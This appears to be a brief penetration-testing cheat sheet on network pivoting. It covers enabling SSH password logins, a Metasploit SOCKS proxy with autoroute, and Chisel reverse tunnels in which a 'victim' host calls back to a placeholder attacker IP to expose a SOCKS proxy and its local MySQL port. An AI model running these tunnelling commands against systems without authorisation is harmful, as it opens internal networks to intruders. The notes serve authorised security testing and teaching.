# Network Forwarding

### SSH

Enable password authentication

```bash
sudo sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config
```

Reboot ssh service

```bash
sudo systemctl start ssh.service
```

### Metasploit

Use proxy

```bash
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
set version 4a # proxychains.conf socks4 127.0.0.1 1080
exploit
```

Autoroute

```
use multi/manage/autoroute
set session 1
exploit
```

Check proxy

```bash
netstat -an | grep :1080
```

### Chisel

Socks Proxy

```bash
# Attacker
chisel server -p 8080 --socks5 --reverse

# Victim
.\chisel.exe client <attacker-ip>:8080 R:1080:socks

# sudo nano /etc/proxychains.conf
socks5 127.0.0.1 1080
```

Port forwarding, attacker port 3306 (R:3306) -> victim 3306 (127.0.0.1:3306/tcp).

```bash
# Attacker
chisel server -p 8080 --reverse

# Victim
.\chisel.exe client <attacker-ip>:8080 R:3306:127.0.0.1:3306/tcp
```